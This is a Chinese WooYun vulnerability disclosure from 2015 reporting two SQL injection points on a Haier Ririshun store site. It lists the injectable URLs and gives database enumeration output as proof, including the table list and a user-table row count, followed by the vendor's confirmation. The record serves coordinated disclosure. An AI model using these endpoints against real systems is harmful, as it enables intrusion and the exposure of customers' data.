当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148963

漏洞标题:海尔旗下日日顺某分站sql注入2处

相关厂商:海尔集团

漏洞作者: 撸撸侠

提交时间:2015-10-23 18:25

修复时间:2015-12-10 17:24

公开时间:2015-12-10 17:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-23: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

海尔旗下日日顺某分站sql注入2处

详细说明:

http://store.rrs.com/nearStore/ajaxJsp/experience_store.jsp?area_id=1&postType=getStorePage&pageNo=0
http://store.rrs.com/nearStore/ajaxJsp/experience_store.jsp?pid=1&postType=getRegion

漏洞证明:

Database: rrs_store
[84 tables]
+--------------------------------------+
| QRTZ_BLOB_TRIGGERS |
| QRTZ_CALENDARS |
| QRTZ_CRON_TRIGGERS |
| QRTZ_FIRED_TRIGGERS |
| QRTZ_JOB_DETAILS |
| QRTZ_JOB_LISTENERS |
| QRTZ_LOCKS |
| QRTZ_PAUSED_TRIGGER_GRPS |
| QRTZ_SCHEDULER_STATE |
| QRTZ_SIMPLE_TRIGGERS |
| QRTZ_TRIGGERS |
| QRTZ_TRIGGER_LISTENERS |
| article |
| base_region |
| experience_store |
| freight_models |
| hat_area |
| hat_city |
| hat_province |
| logistics_specials |
| our_article |
| rrs_ad |
| rrs_ad_tree |
| rrs_adposition |
| rrs_article |
| rrs_article_category |
| rrs_article_comment |
| rrs_article_normal |
| rrs_article_normal_type |
| rrs_attribute_enumerate |
| rrs_brand |
| rrs_business_services |
| rrs_buy_shop |
| rrs_cart |
| rrs_category |
| rrs_category_attribute |
| rrs_comment_goods |
| rrs_comment_shop |
| rrs_complaint |
| rrs_complaint_message |
| rrs_customization |
| rrs_customization_goods |
| rrs_deliveries |
| rrs_express_infos |
| rrs_express_list |
| rrs_favorite |
| rrs_goods |
| rrs_goods_attribute_custom_solutions |
| rrs_goods_attribute_middle |
| rrs_goods_pic |
| rrs_interface_order_log |
| rrs_interface_pl |
| rrs_interface_pl_log |
| rrs_message |
| rrs_order |
| rrs_order_express |
| rrs_order_item |
| rrs_refund |
| rrs_region |
| rrs_service_changefilter |
| rrs_service_commerce |
| rrs_service_installation |
| rrs_service_onsite |
| rrs_service_repair |
| rrs_service_shift |
| rrs_shop |
| rrs_shop_category |
| rrs_shop_copy |
| rrs_shop_express |
| rrs_shop_pic |
| rrs_user |
| rrs_user_address |
| rrs_user_level |
| skus |
| sys_action |
| sys_dictionary |
| sys_dictionary_category |
| sys_menu |
| sys_role |
| sys_role_menu |
| sys_role_menu_action |
| sys_user |
| sys_user_detail |
| sys_user_role |
+--------------------------------------+


Database: rrs_store
+----------+---------+
| Table | Entries |
+----------+---------+
| rrs_user | 73283 |
+----------+---------+

修复方案:

版权声明:转载请注明来源 撸撸侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-26 17:22

厂商回复:

感谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理

最新状态:

暂无